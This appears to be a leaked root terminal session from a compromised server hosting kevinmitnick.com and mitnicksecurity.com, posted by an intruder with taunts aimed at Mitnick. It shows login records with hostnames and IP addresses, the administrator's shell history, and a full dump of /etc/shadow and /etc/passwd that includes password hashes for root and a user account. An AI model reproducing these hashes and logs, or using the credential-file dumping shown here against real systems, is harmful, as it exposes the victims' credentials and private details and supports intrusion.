- [mitnicksecurity.com]
- [kevinmitnick.com]
root@www.kevinmitnick.com's password:
Last login: Mon Jul 13 17:08:58 2012 from 58.jerveyave.com
---------------------------------------------------------------------------
root@dc21 [~]# w
11:10:22 up 3 days, 12:54, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root@dc21 [~]# uname -a;id
Linux dc21.hostedhere.net 2.6.18-308.1.18.el5.028stab060.2 #1 SMP Tue Jan 13
11:38:36 MSK 2011 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@dc21 [~]# last
reboot system boot 2.6.18-92.1.18.e Mon Jul 13 22:15 (3+12:37)
root pts/0 58.jerveyave.com Mon Jul 13 17:08 - crash (05:07)
root pts/0 greenville.isopo Mon Jul 13 05:55 - 13:35 (07:39)
reboot system boot 2.6.18-92.1.18.e Mon Jul 13 00:15 (4+10:38)
reboot system boot 2.6.18-92.1.18.e Sun Jul 12 23:58 (00:09)
root pts/0 greenville.isopo Fri Jul 10 04:50 - 11:59 (07:09)
mitsec pts/0 72.19.162.209 Thu Jul 9 09:41 - 10:01 (00:20)
root pts/0 58.jerveyave.com Wed Jul 8 21:27 - 21:27 (00:00)
root pts/0 58.jerveyave.com Tue Jul 7 20:00 - 08:12 (12:11)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 19:46 (5+03:53)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 17:07 (00:13)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 10:59 (05:36)
root pts/0 greenville.isopo Tue Jul 7 05:33 - down (05:17)
root pts/0 5ace2de4.bb.sky. Tue Jul 7 05:31 - 05:32 (00:01)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 02:53 (07:57)
mitsec pts/0 ip68-229-7-88.lv Thu Jul 2 00:17 - 02:30 (02:13)
mitsec pts/0 ip68-229-7-88.lv Wed Jul 1 00:41 - 01:31 (00:50)
root pts/3 tech1.xyzdns.net Tue Jun 30 09:33 - 10:01 (00:27)
root pts/2 tech1.xyzdns.net Tue Jun 30 09:32 - 10:01 (00:28)
root pts/1 tech1.xyzdns.net Tue Jun 30 09:30 - 10:01 (00:30)
root pts/0 58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19)
mitsec pts/1 93.sub-75-212-18 Mon Jun 29 12:40 - 14:57 (02:16)
root pts/0 58.jerveyave.com Mon Jun 29 05:30 - 15:14 (09:43)
mitsec pts/0 110.sub-75-212-1 Mon Jun 29 04:35 - 04:37 (00:02)
mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:47 - 02:14 (00:26)
mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:19 - 01:25 (00:06)
mitsec pts/0 c-67-169-204-62. Mon Jun 29 01:19 - 02:46 (01:27)
mitsec pts/1 c-67-169-204-62. Mon Jun 29 01:14 - 01:18 (00:04)
mitsec pts/0 nmd.sbx03424.las Mon Jun 29 01:08 - 01:15 (00:06)
mitsec pts/0 nmd.sbx03424.las Mon Jun 29 00:11 - 00:32 (00:20)
root pts/1 tech1.xyzdns.net Tue Jun 23 05:31 - 06:50 (01:18)
root pts/1 tech1.xyzdns.net Tue Jun 23 05:28 - 05:30 (00:01)
root pts/0 tech1.xyzdns.net Mon Jun 22 17:54 - 16:17 (22:23)
mitsec pts/1 nmd.sbx03424.las Sat Jun 20 02:57 - 03:37 (00:40)
mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05 (00:03)
mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28 (00:44)
root pts/0 58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11)
mitsec pts/0 ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40 (00:31)
mitsec pts/0 ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53 (00:00)
mitsec pts/0 pool-71-106-244- Mon Jun 15 03:08 - 03:10 (00:02)
mitsec pts/0 pool-71-106-244- Tue Jun 9 15:44 - 16:10 (00:25)
root pts/0 greenville.isopo Tue Jun 9 12:14 - 14:02 (01:47)
reboot system boot 2.6.18-92.1.18.e Mon May 18 15:12 (49+05:01)
mitsec pts/0 ip72-193-114-177 Fri May 15 01:44 - 01:59 (00:14)
root pts/0 greenville.isopo Fri Apr 24 06:58 - 11:09 (04:11)
reboot system boot 2.6.18-92.1.18.e Thu Apr 23 20:26 (73+23:47)
mitsec pts/1 186.81.109.196 Mon Apr 20 11:00 - 15:50 (04:50)
root pts/1 tech1.xyzdns.net Sun Apr 19 11:39 - 14:16 (02:36)
root pts/0 58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34)
reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:55 (4+11:41)
reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:46 (00:04)
root pts/1 tech1.xyzdns.net Sat Apr 18 14:07 - 14:35 (00:28)
root pts/0 tech1.xyzdns.net Sat Apr 18 08:18 - 01:28 (17:10)
reboot system boot 2.6.18-92.1.18.e Sat Apr 18 07:15 (23:30)
reboot system boot 2.6.18-92.1.18.e Fri Apr 17 03:51 (1+03:24)
root pts/1 58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20)
mitsec pts/2 wsip-70-168-126- Wed Mar 25 21:34 - 23:46 (02:12)
root pts/1 58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41)
root pts/4 tech1.xyzdns.net Tue Mar 24 11:09 - 13:21 (02:12)
root pts/3 greenville.isopo Tue Mar 24 11:05 - 14:32 (03:27)
root pts/2 tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37)
root pts/2 tech1.xyzdns.net Sat Mar 21 15:49 - 17:09 (01:19)
root pts/1 66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36)
root pts/0 tech3.xyzdns.net Sat Mar 21 14:08 - 16:40 (02:32)
root pts/0 66-191-205-150.d Sat Mar 21 08:54 - 13:08 (04:13)
reboot system boot 2.6.18-92.1.18.e Sat Mar 21 08:43 (26+19:06)
reboot system boot 2.6.9-023stab040 Sat May 26 10:33 (00:22)
The battle has begin, Mitnick.
root@dc21 [~]# cd /root
root@dc21 [~]# ls -la
total 92
drwxr-xr-x 12 root root 4096 Jul 17 10:51 .
drwxr-xr-x 22 root root 4096 Jul 13 22:16 ..
drwxr-xr-x 7 root root 4096 Mar 21 10:30 .MirrorSearch
-rwxr-xr-x 1 root root 4659 Jul 13 13:35 .bash_history
-rwxr-xr-x 1 root root 24 Jan 6 2012 .bash_logout
-rwxr-xr-x 1 root root 191 Jan 6 2012 .bash_profile
-rwxr-xr-x 1 root root 413 Mar 21 14:09 .bashrc
drwxr-xr-x 4 root root 4096 Mar 21 10:37 .cpanel
drwxr-xr-x 4 root root 4096 Mar 21 09:26 .cpobjcache
-rwxr-xr-x 1 root root 100 Jan 6 2007 .cshrc
drwxr-xr-x 2 root root 4096 Mar 21 09:28 .gnupg
-rw------- 1 root root 46 Jul 6 19:27 .my.cnf
-rwxr-xr-x 1 root root 264 Jul 15 00:27 .pearrc
-rwxr-xr-x 1 root root 1024 Mar 21 10:37 .rnd
drwxr-xr-x 3 root root 4096 Mar 21 10:36 .spamassassin
-rwxr-xr-x 1 root root 129 Jan 6 2012 .tcshrc
drwxr-xr-x 4 root root 4096 Mar 21 14:21 cpanel3-skel
drwxr-xr-x 2 root root 4096 Mar 21 10:22 public_ftp
drwxr-xr-x 3 root root 4096 Mar 21 10:22 public_html
-rwxr-xr-x 1 root root 2171 Dec 12 2011 pure-ftpd
drwxr-xr-x 2 root root 4096 Mar 21 14:09 security
drwxr-xr-x 3 root root 4096 Mar 21 15:51 tmp
root@dc21 [~]# cat .bash_history
root@dc21 [~]# cat .bash_history
passwd
w
w.
w
cd /home
wget http://layer1.cpanel.net/latest
sh latest
/scripts/upcp
w
cd /
ls
mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz
3-21-mitsec-os-image.tgz
ls -l
ls
cd home
ls
wget http://dc21.hostedhere.net/mitsec.tar.gzw
w
ls
cd /home/
ls
/scripts/restorepkg mitsec.tar.gz
mkdir /root/security;cd /root/security
wget http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm
1;rm -f psm.txt;rm -f psm
ls -l
chkrootkit
/usr/local/bin/rkhunter --update
rkhunter -sk -c
/sbin/service apf restart
/sbin/ifconfig
vi /etc/apf/conf.apf
/sbin/service apf restart
cd /root
/scripts/fixdc
/scripts/fixndc
vi /etc/cpupdate.conf
vi /etc/hosts
cd /scripts/
./restartsrv named
./restartsrv http
./upcp --force
./fixcommonproblems
./reinstallmailman
cd /root
hostname -i
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
vi /etc/apf/conf.apf
/sbin/service sshd restart
/etc/apf/apf -r
cd /root
vi /usr/local/lib/php.ini
vi /usr/local/php4/lib/php.ini
/scripts/restartsrv httpd
vi /etc/apf/conf.apf
apf -r
/sbin/service pure-ftpd stop
mv /etc/rc.d/init.d/pure-ftpd /root/
echo > /etc/rc.d/init.d/pure-ftpd
chattr +i /etc/rc.d/init.d/pure-ftpd
vi /etc/pam.d/crond
service crond restart
passwd mitsec
cd /var/log/
ls
tail secure
w
w
pico /etc/httpd/conf/httpd.conf
whereis php.ini
pico /usr/lib/php.ini
service httpd restart
pico /etc/httpd/conf/httpd.conf
pico /usr/local/apache/conf/php.conf
cd /etc/httpd/conf/
ls
pico php.conf
php -i | grep php.ini
pico /usr/local/lib/php.ini
/scripts/installgd
tail -f /etc/httpd/logs/error_log
service httpd restart
tail -f /etc/httpd/logs/error_log
/scripts/easyapache
cd /home/mitsec/
cd www
pico info.txt
chown mitsec:mitsec info.txt
psaswd mitsec
psaswd mitsec
passwd mitsec
whereis proftpd
la
ls
ls -l
pico index.php
cd /var/log
cat secure
ls
pico rootlogins
ls
pico apf_log
service apf stop
service apf start
pico apf_log
date
pico /etc/apf/conf.apf
service apf restart
pico apf_log
ls
tail secure
w
tail secure
lastlog
cd /home/mitsec/
ls
cd www
ls
cd ..
ls
pico .bash_history
ls
cd /
ls
w
betstat
netstat
w
ls -l
df -h
w
netstat
netstat
netstat
cd /etc/httpd/logs/
ls
tail -f access_log
tail -f error_log
pico /var/log/secure
grep "510" /etc/shadow
grep "510" /etc/passwd
pico /var/log/secure
w
w
cd /var/log/
grep "65.124.165" *
cd /etc/httpd
ls
cd domlogs/
ls
grep "65.124.165" mitnicksecurity.com
pico mitnicksecurity.com
cd mitsec
ls
pico mitnicksecurity.com
cd /home/mitsec/access-logs/
ls
pico mitnicksecurity.com
w
top
vi /usr/local/apache/conf/httpd.conf
vi /usr/local/apache/conf/httpd.conf
cd /usr/local/apache
du -sh
prm
/scripts/restartsrv httpd
top
top
w
history
pico /etc/apf/conf.apf
service apf restart
ping 4.2.2.1
telnet vpn.isopoly.com 25
w
telnet vpn.isopoly.com 25
w
top
w
lastlog
history
exit
w
lastlog
rkhunter -c
w
chkrootkit
ps -aux
cd /var/tmp/
ls -l
cd /tmp
ls -l
rm -Rf r*
cd /usr/local/apache;
ls -l pr
w
top
rkhunter -c
w
vi /usr/local/sim/conf.sim
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
/sbin/service sshd restart
/sbin/service apf restart
w
ifconfig
cd /var/log/
tail secure
pico secure
w
w
tail secure
tail secure
tail secure
tail secure
tail secure
cd /etc/ssh
dir
vi sshd_config
w
cd /home/
ls
cd no
ls
cd ..
ls
cd /var/log/
tail secure
tail -n 100 secure
cd /tmp
ls
cd /var/log/btmp
pico /var/log/btmp
cd /var/log
ls -l btmp
pico /etc/passwd
rkhunter
rkhunter -c
tail /var/cpanel/accounting.log
tail /var/cpanel/root.accts
df -h
top
history
cd /home/mitsec/
ls -l
cat .lastlogin
ls
cd www
ls
ls -l |grep "Jul"
ls -l
cd ..
ls
cd ..
ls
ls -l
df -h
cd /home/
ls
ls -l
cd mitsec/
ls
ls -l
cd /home/
ls
cd /
ls
ls -l
df -h
rm -Rf 3-21-mitsec-os-image.tgz
df -h
cd /etc
ls
ls -l
top
w
tail /var/log/secure
tail /var/log/messages
netstat
exit
w
df -h
cd /home/
ls
cd no
ls
ls -l
cd ..
ls
cd mitsec/
ls
ls -l
cd public_
cd public_html/
ls
ls -l
ls -l contact_form.php
pico contact_form.php
df -h
top
w
ls -l
cd /
ls
cd ..
ls -l
cd /
ls
ls -l
w
df -h
top
w
cd /
ls
cd tmp
ls
cd backupfileehwcb2/
ls
ls -l
cd ..
ls
cd /
ls
ls -l
rm tmp.tar
ls -l
df -h
cd /home
ls
cd cpbackuptmp/
ls
cd cpbackup/ <-- I *wonder* what's in his CP dir
ls
ls -l
cd daily/
ls
cd ..
cd weekly/
ls
ls -l
cd ..
ls
cd monthly/
ls
cd ..
cd weekly/
ls -l
cd ..
ls
cd ..
ls
cd ..
ls
cd no
ls
cd sources/
ls
cd modules/
ls
ls -l
cd ..
ls
cd authors/
ls
ls -l
cd ..
ls
ls -l
pico MIRRORED.BY
cd ..
ls
ls -l
cd ..
ls
cd virtfs/
ls
ls -l
cd mitsec/
ls
ls -l
cd home
ls
ls -l
cd mitsec/
ls
cd ..
cd ..
cd ..
ls
cd ..
ls
cd /
ls
w
top
root@dc21 [~]# w
10:53:46 up 3 days, 12:38, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root@dc21 [~]# cat /etc/shadow /etc/passwd
root:$1$5K/cgjHy$YY0B5o9EuLytWnXPBP7eU0:14430:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
cpanel:*:14324::::::
postfix:!!:14324::::::
xfs:!!:14324::::::
mysql:!!:14324::::::
mailman:*:14324::::::
cpanelhorde:*:14324::::::
cpanelphpmyadmin:*:14324::::::
cpanelphppgadmin:*:14324::::::
cpanelroundcube:*:14324::::::
mitsec:$1$VVB/aSDv$cFi4QkgSPku7Gsc0nR.gz/:14327:0:99999:7:::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/
bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc
al/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc
al/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local
/cpanel/bin/noshell
mitsec:x:510:510::/home/mitsec:/usr/local/cpanel/bin/jailshell
Sorry Kevin, but your security is bullshit<3~